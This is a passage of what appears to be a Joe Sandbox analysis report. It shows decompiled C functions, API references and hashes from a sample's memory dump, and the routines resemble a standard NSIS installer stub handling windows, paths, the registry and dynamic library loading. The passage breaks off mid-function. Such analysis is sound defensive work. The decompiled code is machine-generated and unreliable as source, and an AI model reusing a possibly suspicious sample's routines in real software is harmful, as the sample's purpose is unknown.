                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: 34521723c529513f9d2f25f2c915d7e6e1bbb21449fac5a346249fa94324e5da
                                                        • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                        • Opcode Fuzzy Hash: 34521723c529513f9d2f25f2c915d7e6e1bbb21449fac5a346249fa94324e5da
                                                        • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00401C2E(intOrPtr __edx) {
                                                        				int _t29;
                                                        				long _t30;
                                                        				signed int _t32;
                                                        				CHAR* _t35;
                                                        				long _t36;
                                                        				int _t41;
                                                        				signed int _t42;
                                                        				int _t46;
                                                        				int _t56;
                                                        				intOrPtr _t57;
                                                        				struct HWND__* _t61;
                                                        				void* _t64;
                                                        
                                                        				_t57 = __edx;
                                                        				_t29 = E00402BAC(3);
                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                        				 *(_t64 - 8) = _t29;
                                                        				_t30 = E00402BAC(4);
                                                        				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                        				 *(_t64 + 8) = _t30;
                                                        				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                        					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                        				}
                                                        				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                        				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                        					 *(_t64 + 8) = E00402BCE(0x44);
                                                        				}
                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                        				_push(1);
                                                        				if(__eflags != 0) {
                                                        					_t59 = E00402BCE();
                                                        					_t32 = E00402BCE();
                                                        					asm("sbb ecx, ecx");
                                                        					asm("sbb eax, eax");
                                                        					_t35 =  ~( *_t31) & _t59;
                                                        					__eflags = _t35;
                                                        					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                        					goto L10;
                                                        				} else {
                                                        					_t61 = E00402BAC();
                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                        					_t41 = E00402BAC(2);
                                                        					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                        					_t56 =  *(_t64 - 0x14) >> 2;
                                                        					if(__eflags == 0) {
                                                        						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                        						L10:
                                                        						 *(_t64 - 0xc) = _t36;
                                                        					} else {
                                                        						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                        						asm("sbb eax, eax");
                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                        					}
                                                        				}
                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                        				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                        					_push( *(_t64 - 0xc));
                                                        					E00406055();
                                                        				}
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                        				return 0;
                                                        			}















                                                        0x00401c2e
                                                        0x00401c30
                                                        0x00401c37
                                                        0x00401c3a
                                                        0x00401c3d
                                                        0x00401c47
                                                        0x00401c4b
                                                        0x00401c4e
                                                        0x00401c57
                                                        0x00401c57
                                                        0x00401c5a
                                                        0x00401c5e
                                                        0x00401c67
                                                        0x00401c67
                                                        0x00401c6a
                                                        0x00401c6e
                                                        0x00401c70
                                                        0x00401cc5
                                                        0x00401cc7
                                                        0x00401cd0
                                                        0x00401cd8
                                                        0x00401cdb
                                                        0x00401cdb
                                                        0x00401ce4
                                                        0x00000000
                                                        0x00401c72
                                                        0x00401c79
                                                        0x00401c7b
                                                        0x00401c7e
                                                        0x00401c84
                                                        0x00401c8b
                                                        0x00401c8e
                                                        0x00401cb6
                                                        0x00401cea
                                                        0x00401cea
                                                        0x00401c90
                                                        0x00401c9e
                                                        0x00401ca6
                                                        0x00401ca9
                                                        0x00401ca9
                                                        0x00401c8e
                                                        0x00401ced
                                                        0x00401cf0
                                                        0x00401cf6
                                                        0x004029a5
                                                        0x004029a5
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                        • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                        • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                        • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405A8F(CHAR* _a4) {
                                                        				CHAR* _t7;
                                                        
                                                        				_t7 = _a4;
                                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                        					lstrcatA(_t7, 0x40a014);
                                                        				}
                                                        				return _t7;
                                                        			}




                                                        0x00405a90
                                                        0x00405aa7
                                                        0x00405aaf
                                                        0x00405aaf
                                                        0x00405ab7

                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3936084776
                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                        • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E0040209D(void* __ebx, void* __eflags) {
                                                        				void* _t27;
                                                        				struct HINSTANCE__* _t30;
                                                        				CHAR* _t32;
                                                        				intOrPtr* _t33;
                                                        				void* _t34;
                                                        
                                                        				_t27 = __ebx;
                                                        				asm("sbb eax, 0x42f4f8");
                                                        				 *(_t34 - 4) = 1;
                                                        				if(__eflags < 0) {
                                                        					_push(0xffffffe7);
                                                        					L15:
                                                        					E00401423();
                                                        					L16:
                                                        					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                        					return 0;
                                                        				}
                                                        				_t32 = E00402BCE(0xfffffff0);
                                                        				 *(_t34 + 8) = E00402BCE(1);
                                                        				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                        					L3:
                                                        					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                        					if(_t30 == _t27) {
                                                        						_push(0xfffffff6);
                                                        						goto L15;
                                                        					}
                                                        					L4:
                                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                        					if(_t33 == _t27) {
                                                        						E0040521E(0xfffffff7,  *(_t34 + 8));
                                                        					} else {
                                                        						 *(_t34 - 4) = _t27;
                                                        						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                        							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
                                                        						} else {
                                                        							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                        							if( *_t33() != 0) {
                                                        								 *(_t34 - 4) = 1;
                                                        							}
                                                        						}
                                                        					}
                                                        					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                                                        						FreeLibrary(_t30);
                                                        					}
                                                        					goto L16;
                                                        				}
                                                        				_t30 = GetModuleHandleA(_t32);
                                                        				if(_t30 != __ebx) {
                                                        					goto L4;
                                                        				}
                                                        				goto L3;
                                                        			}








                                                        0x0040209d
                                                        0x0040209d
                                                        0x004020a2
                                                        0x004020a9
                                                        0x00402164
                                                        0x004022dd
                                                        0x004022dd
                                                        0x00402a5a
                                                        0x00402a5d
                                                        0x00402a69
                                                        0x00402a69
                                                        0x004020b8
                                                        0x004020c2
                                                        0x004020c5
                                                        0x004020d4
                                                        0x004020de
                                                        0x004020e2
                                                        0x0040215d
                                                        0x00000000
                                                        0x0040215d
                                                        0x004020e4
                                                        0x004020ed
                                                        0x004020f1
                                                        0x00402135
                                                        0x004020f3
                                                        0x004020f6
                                                        0x004020f9
                                                        0x00402129
                                                        0x004020fb
                                                        0x004020fe
                                                        0x00402107
                                                        0x00402109
                                                        0x00402109
                                                        0x00402107
                                                        0x004020f9
                                                        0x0040213d
                                                        0x00402152
                                                        0x00402152
                                                        0x00000000
                                                        0x0040213d
                                                        0x004020ce
                                                        0x004020d2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00427A9C,747DEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00427A9C,747DEA30), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2987980305-0
                                                        • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                        • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                        • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                        • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00402E3D(intOrPtr _a4) {
                                                        				long _t2;
                                                        				struct HWND__* _t3;
                                                        				struct HWND__* _t6;
                                                        
                                                        				if(_a4 == 0) {
                                                        					__eflags =  *0x429448; // 0x0
                                                        					if(__eflags == 0) {
                                                        						_t2 = GetTickCount();
                                                        						__eflags = _t2 -  *0x42f430;
                                                        						if(_t2 >  *0x42f430) {
                                                        							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                                                        							 *0x429448 = _t3;
                                                        							return ShowWindow(_t3, 5);
                                                        						}
                                                        						return _t2;
                                                        					} else {
                                                        						return E0040653C(0);
                                                        					}
                                                        				} else {
                                                        					_t6 =  *0x429448; // 0x0
                                                        					if(_t6 != 0) {
                                                        						_t6 = DestroyWindow(_t6);
                                                        					}
                                                        					 *0x429448 = 0;
                                                        					return _t6;
                                                        				}
                                                        			}






                                                        0x00402e44
                                                        0x00402e5e
                                                        0x00402e64
                                                        0x00402e6e
                                                        0x00402e74
                                                        0x00402e7a
                                                        0x00402e8b
                                                        0x00402e94
                                                        0x00000000
                                                        0x00402e99
                                                        0x00402ea0
                                                        0x00402e66
                                                        0x00402e6d
                                                        0x00402e6d
                                                        0x00402e46
                                                        0x00402e46
                                                        0x00402e4d
                                                        0x00402e50
                                                        0x00402e50
                                                        0x00402e56
                                                        0x00402e5d
                                                        0x00402e5d

                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                        • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                        • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                        • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E00405B7D(void* __eflags, intOrPtr _a4) {
                                                        				int _t11;
                                                        				signed char* _t12;
                                                        				intOrPtr _t18;
                                                        				intOrPtr* _t21;
                                                        				void* _t22;
                                                        
                                                        				E004060F7(0x42bc98, _a4);
                                                        				_t21 = E00405B28(0x42bc98);
                                                        				if(_t21 != 0) {
                                                        					E004063D2(_t21);
                                                        					if(( *0x42f43c & 0x00000080) == 0) {
                                                        						L5:
                                                        						_t22 = _t21 - 0x42bc98;
                                                        						while(1) {
                                                        							_t11 = lstrlenA(0x42bc98);
                                                        							_push(0x42bc98);
                                                        							if(_t11 <= _t22) {
                                                        								break;
                                                        							}
                                                        							_t12 = E0040646B();
                                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                        								E00405AD6(0x42bc98);
                                                        								continue;
                                                        							} else {
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        						E00405A8F();
                                                        						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                        					}
                                                        					_t18 =  *_t21;
                                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                                        						goto L1;
                                                        					} else {
                                                        						goto L5;
                                                        					}
                                                        				}
                                                        				L1:
                                                        				return 0;
                                                        			}








                                                        0x00405b89
                                                        0x00405b94
                                                        0x00405b98
                                                        0x00405b9f
                                                        0x00405bab
                                                        0x00405bb7
                                                        0x00405bb7
                                                        0x00405bcf
                                                        0x00405bd0
                                                        0x00405bd7
                                                        0x00405bd8
                                                        0x00000000
                                                        0x00000000
                                                        0x00405bbb
                                                        0x00405bc2
                                                        0x00405bca
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405bc2
                                                        0x00405bda
                                                        0x00000000
                                                        0x00405bee
                                                        0x00405bad
                                                        0x00405bb1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405bb1
                                                        0x00405b9a
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                          • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,747DFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                          • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                        • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,747DFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                        • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,747DFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,747DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3248276644-3936084776
                                                        • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                        • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                        • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                        • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                        				int _t11;
                                                        				int _t15;
                                                        				long _t16;
                                                        
                                                        				_t15 = _a8;
                                                        				if(_t15 != 0x102) {
                                                        					__eflags = _t15 - 0x200;
                                                        					if(_t15 != 0x200) {
                                                        						_t16 = _a16;
                                                        						L7:
                                                        						__eflags = _t15 - 0x419;
                                                        						if(_t15 == 0x419) {
                                                        							__eflags =  *0x42a87c - _t16; // 0x0
                                                        							if(__eflags != 0) {
                                                        								_push(_t16);
                                                        								_push(6);
                                                        								 *0x42a87c = _t16;
                                                        								E00404B4E();
                                                        							}
                                                        						}
                                                        						L11:
                                                        						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                        					}
                                                        					_t11 = IsWindowVisible(_a4);
                                                        					__eflags = _t11;
                                                        					if(_t11 == 0) {
                                                        						L10:
                                                        						_t16 = _a16;
                                                        						goto L11;
                                                        					}
                                                        					_t16 = E00404ACE(_a4, 1);
                                                        					_t15 = 0x419;
                                                        					goto L7;
                                                        				}
                                                        				if(_a12 == 0x20) {
                                                        					E004041C7(0x413);
                                                        					return 0;
                                                        				}
                                                        				goto L10;
                                                        			}






                                                        0x00405196
                                                        0x004051a0
                                                        0x004051b6
                                                        0x004051bc
                                                        0x004051de
                                                        0x004051e1
                                                        0x004051e1
                                                        0x004051e7
                                                        0x004051e9
                                                        0x004051ef
                                                        0x004051f1
                                                        0x004051f2
                                                        0x004051f4
                                                        0x004051fa
                                                        0x004051fa
                                                        0x004051ef
                                                        0x00405204
                                                        0x00000000
                                                        0x00405212
                                                        0x004051c1
                                                        0x004051c7
                                                        0x004051c9
                                                        0x00405201
                                                        0x00405201
                                                        0x00000000
                                                        0x00405201
                                                        0x004051d5
                                                        0x004051d7
                                                        0x00000000
                                                        0x004051d7
                                                        0x004051a6
                                                        0x004051ad
                                                        0x00000000
                                                        0x004051b2
                                                        0x00000000

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 004051C1
                                                        • CallWindowProcA.USER32 ref: 00405212
                                                          • Part of subcall function 004041C7: SendMessageA.USER32(00030290,00000000,00000000,00000000), ref: 004041D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                        • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                        • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                        • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 90%
                                                        			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                        				int _v8;
                                                        				long _t21;
                                                        				long _t24;
                                                        				char* _t30;
                                                        
                                                        				asm("sbb eax, eax");
                                                        				_v8 = 0x400;
                                                        				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                        				_t30 = _a16;
                                                        				if(_t21 != 0) {
                                                        					L4:
                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                        				} else {
                                                        					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                        					_t21 = RegCloseKey(_a20);
                                                        					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                        						goto L4;
                                                        					}
                                                        				}
                                                        				return _t21;
                                                        			}







                                                        0x00405fec
                                                        0x00405fee
                                                        0x00406006
                                                        0x0040600b
                                                        0x00406010
                                                        0x0040604d
                                                        0x0040604d
                                                        0x00406012
                                                        0x00406024
                                                        0x0040602f
                                                        0x00406035
                                                        0x0040603f
                                                        0x00000000
                                                        0x00000000
                                                        0x0040603f
                                                        0x00406052

                                                        APIs
                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406293,80000002), ref: 00406024
                                                        • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 0040602F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: : Completed
                                                        • API String ID: 3356406503-2954849223
                                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                        • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00403875() {
                                                        				void* _t2;
                                                        				void* _t3;
                                                        				void* _t6;
                                                        				void* _t8;
                                                        
                                                        				_t8 =  *0x429854; // 0x0
                                                        				_t3 = E0040385A(_t2, 0);
                                                        				if(_t8 != 0) {
                                                        					do {
                                                        						_t6 = _t8;
                                                        						_t8 =  *_t8;
                                                        						FreeLibrary( *(_t6 + 8));
